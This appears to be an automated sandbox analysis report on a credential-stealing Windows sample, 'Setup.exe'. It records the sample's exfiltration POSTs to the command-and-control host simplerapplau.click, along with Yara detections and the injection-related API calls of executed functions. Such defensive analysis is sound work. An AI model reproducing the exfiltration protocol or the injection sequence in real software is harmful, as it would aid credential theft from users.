bSIMvIUJxYrXAr7xwwwjq2GmXJLTciagsoOwTWRBUjTupB99U8MRGUfI7bAKk7z+rCKekZ04KDD6R7YIpEgKN201jLtR3tEKU5coNBgVf7p0tkmVz3v8ZiMUYl81zEoy7SXcacFMwc7XFvGvhQNurCkhGRPTcikjcIH3CSGYybT+5AqjFd9SCtcCri/fE6z+t3JQUt9+LaY3UT9MYYpSZ7k1zL7VzNEdQxSuIQjTvPq19IhGySm45GCEJsk13s6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49764	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:29:47 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OSOPAWUPK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12789 Host: simplerapplau.click
2024-12-18 17:29:47 UTC	12789	OUT	Data Raw: 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4f 53 4f 50 41 57 55 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --OSOPAWUPKContent-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--OSOPAWUPKContent-Disposition: form-data; name="pid"2--OSOPAWUPKContent-Disposition: form-data; name="lid"hRjzG3--VIKA--OSOPAWUPKContent-Dispo
2024-12-18 17:29:48 UTC	1039	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tt4nnopqjub4f0gvl1dv75qag5; expires=Sun, 13-Apr-2025 11:16:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=439Ai7YRMKeTBm%2F0CoCVqgS0eAh5QVgU4HZf9E6ex9Ro52lRR04a78Jz8Ck2c2Ga0z139Xl1TXxEs2LIvnC9lkWxJCxOlo1kk0DJNX5JlNop30e%2BExwdWGIkPBpBjvoByi6do0tZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e0875c2041f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2491&min_rtt=1746&rtt_var=1187&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2849&recv_bytes=13723&delivery_rate=1672394&cwnd=223&unsent_bytes=0&cid=0b3f44362237165d&ts=1524&x=0"
2024-12-18 17:29:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 17:29:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49769	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:29:50 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=95U070K97 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15021 Host: simplerapplau.click
2024-12-18 17:29:50 UTC	15021	OUT	Data Raw: 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 39 35 55 30 37 30 4b 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --95U070K97Content-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--95U070K97Content-Disposition: form-data; name="pid"2--95U070K97Content-Disposition: form-data; name="lid"hRjzG3--VIKA--95U070K97Content-Dispo
2024-12-18 17:29:55 UTC	1049	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=51b0a0nd7pf0tqhmr0b7aep3kl; expires=Sun, 13-Apr-2025 11:16:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y9rkv44bL0PPGvftviBz2%2Bc0am%2BEYWle7OQIhWyeEVcLQZk1qgIaDkjCmdw1Xn90ejdNwFYuX0%2BV%2BhzD403pzvMAppk%2FoU1jwvUOF3QTWbuuRg%2BCG%2BSfdAdAqlxBK8fak2KpPUY2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e09a8c400f93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1731&rtt_var=779&sent=14&recv=19&lost=0&retrans=0&sent_bytes=2849&recv_bytes=15955&delivery_rate=1686886&cwnd=168&unsent_bytes=0&cid=2402b2312e03dd95&ts=5308&x=0"
2024-12-18 17:29:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 17:29:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49784	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:29:57 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ON1XKKPRLZQFFS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20376 Host: simplerapplau.click
2024-12-18 17:29:57 UTC	15331	OUT	Data Raw: 2d 2d 4f 4e 31 58 4b 4b 50 52 4c 5a 51 46 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4f 4e 31 58 4b 4b 50 52 4c 5a 51 46 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 4e 31 58 4b 4b 50 52 4c 5a 51 46 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 4f 4e 31 58 4b 4b 50 52 4c Data Ascii: --ON1XKKPRLZQFFSContent-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--ON1XKKPRLZQFFSContent-Disposition: form-data; name="pid"3--ON1XKKPRLZQFFSContent-Disposition: form-data; name="lid"hRjzG3--VIKA--ON1XKKPRL
2024-12-18 17:29:57 UTC	5045	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-18 17:30:01 UTC	1050	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4dlv36782oavstgjsitqfa1iss; expires=Sun, 13-Apr-2025 11:16:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPat8Zli81YLfGTrjvvJLONnvudD0oF8WURIHW%2BinkROqmeOMUr7%2BWZS2k2%2Bu2LUc1mu6GJMDu4OtTYgcQOhNF39iYwwrC%2BaymFdbZPX0oByYKIkeAOlW%2BDeenx7%2B7bLFAz0lNLe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e0c5eb9e0f59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18723&min_rtt=1787&rtt_var=10846&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21337&delivery_rate=1634023&cwnd=221&unsent_bytes=0&cid=d2c74ab75c546539&ts=4504&x=0"
2024-12-18 17:30:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 17:30:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49795	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:30:03 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SK7ROEO9QI62 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1185 Host: simplerapplau.click
2024-12-18 17:30:03 UTC	1185	OUT	Data Raw: 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 53 4b 37 52 4f 45 4f 39 51 49 36 32 0d 0a 43 Data Ascii: --SK7ROEO9QI62Content-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--SK7ROEO9QI62Content-Disposition: form-data; name="pid"1--SK7ROEO9QI62Content-Disposition: form-data; name="lid"hRjzG3--VIKA--SK7ROEO9QI62C
2024-12-18 17:30:08 UTC	1046	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v82osa18e87cn9sm2d1mq6mid9; expires=Sun, 13-Apr-2025 11:16:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLTiD5EIw%2Fkkk9fkXcXbH%2B5ufHHjqlCGc3%2Be2u6jC6G7AX%2FhKeonv6YSpbsef8yJayK9PgCX64CY1Iq61wsJPrcrzNM1GyfYF9K8rtJmWdATvEc9M7kY%2Flcbh1RopP%2F%2FLnnwKuvU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e0ebddf31a34-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2228&min_rtt=2067&rtt_var=890&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2099&delivery_rate=1412675&cwnd=185&unsent_bytes=0&cid=68cb2f70872251e6&ts=4771&x=0"
2024-12-18 17:30:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 17:30:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49805	104.21.88.199	443	7128	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 17:30:09 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SFZ7MPLOIWOP2ZQLAC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1114 Host: simplerapplau.click
2024-12-18 17:30:09 UTC	1114	OUT	Data Raw: 2d 2d 53 46 5a 37 4d 50 4c 4f 49 57 4f 50 32 5a 51 4c 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 32 42 37 36 39 44 38 39 30 34 33 39 31 39 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 53 46 5a 37 4d 50 4c 4f 49 57 4f 50 32 5a 51 4c 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 46 5a 37 4d 50 4c 4f 49 57 4f 50 32 5a 51 4c 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d Data Ascii: --SFZ7MPLOIWOP2ZQLACContent-Disposition: form-data; name="hwid"442B769D890439192A161345CD0A71E7--SFZ7MPLOIWOP2ZQLACContent-Disposition: form-data; name="pid"1--SFZ7MPLOIWOP2ZQLACContent-Disposition: form-data; name="lid"hRjzG3--VIKA
2024-12-18 17:30:13 UTC	1040	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 17:30:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sot6m6f8muuc1cpko1s02lo2f7; expires=Sun, 13-Apr-2025 11:16:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMMoMmk3BctgWOB7JW%2BuqzCoHe%2F4qbYZm5X8hkxkrHvT6Akx438om4iEpZ1NymaJ5K%2FLegzg3l58ZU9JnHh43z3wYNbO9felCT9MfumdScGo0p%2Bu7exjIPtZs4pdJ4uAIWOIgZkM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40e1120e738c23-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1872&min_rtt=1864&rtt_var=716&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2034&delivery_rate=1509043&cwnd=227&unsent_bytes=0&cid=11d916eca91a89e0&ts=4511&x=0"
2024-12-18 17:30:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 17:30:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:29:14
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	10'190'992 bytes
MD5 hash:	8AF6DB9955ABED6390BC281E0430DDC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1297460093.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	41.5%
Total number of Nodes:	118
Total number of Limit Nodes:	11

Executed Functions

Function 02C4C695 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02C4C72E
NtMapViewOfSection.NTDLL(?,00000000), ref: 02C4C7D6
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C4CB4A
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02C4CBFF
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02C4CC1C
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02C4CCBF
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02C4CCF2
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02C4CE63

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: d3d332f2c5b15fa75c51ca6ab07cc2fb75e87ff43d1fbfa2fc283afa78cf78ac
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: B0429C72609341AFD724DF25C844B6BBBE9EFC8714F04492EF9859B261DB30EA41CB91

Function 02C009E5 Relevance: 7.6, APIs: 5, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02C0052B,?,00000001,?,81EC8B55,000000FF), ref: 02C00A23
Thread32First.KERNEL32(00000000,0000001C), ref: 02C00A4F
Wow64SuspendThread.KERNEL32(00000000), ref: 02C00AA2
CloseHandle.KERNEL32(00000000), ref: 02C00ACC
CloseHandle.KERNEL32(00000000), ref: 02C00B00

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 2720937676-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 74d7b9bd41cb83ec5a42ba35a9e95c44b92e8b1031ded1e1d75b024661b7c214
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 7A41F971A00108AFDB18DF99C890FADB7B6EFC8300F118168E6159B7E4DB34AE45CB94

Function 02C00895 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02C00961

Strings

,, xrefs: 02C009AD

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 0d368fd6b565fdc37c85c4622b32c796ba2c64d188daa8e72ad9d06f2660d1bc
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 6441B274E00209EFDB14CF98C994BAEB7B1BF88314F218198D515AB385C775AE81CF94

Function 02C002D5 Relevance: 3.4, APIs: 2, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02C00578
TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02C0086C

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID: CreateProcessTerminateThread
String ID:
API String ID: 1197810419-0
Opcode ID: 0db4d38b37e0ea16a8392408f834227dd665079b62c85feb7516eb92d191e70a
Instruction ID: cd03ccf70043d7035b610d41b2156047191ba8ec1d52327cbbff603c714e8da3
Opcode Fuzzy Hash: 0db4d38b37e0ea16a8392408f834227dd665079b62c85feb7516eb92d191e70a
Instruction Fuzzy Hash: 0C12B0B5E00219DFDB14CF98C990BADBBB2FF88304F2582A9D515AB385C735AA41CF54

Function 02C4D313 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 02C4D3A5

Strings

.dll, xrefs: 02C4D34A

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: 333e4f37bf11ecd2112fbc81d6b342417e6d11529412d17980defac4c04f05ef
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: 9321E4716002858FDB21EF68C844B6FBBB4AF41228F0841ACD80B9BB41DB30E945CB40

Function 02C4BF65 Relevance: 2.8, APIs: 2, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02C4BFDF
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 02C4C323

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: f46b3b12ee340b76a3d70879094fb18874a974e6f2c7ed2dc7a9a53972b9f89e
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: 41B1D371501A02ABDB31AEA0CC80BABB7F9FF89714F14052BE95982160EF31E750DF91

Non-executed Functions

Function 02C36932 Relevance: 116.6, Strings: 93, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a, xrefs: 02C36B75
s, xrefs: 02C36BF3
\, xrefs: 02C369E6
w, xrefs: 02C36C0F
}, xrefs: 02C36C39
o, xrefs: 02C36968
y, xrefs: 02C36C1D
=, xrefs: 02C36A79
A, xrefs: 02C369AE
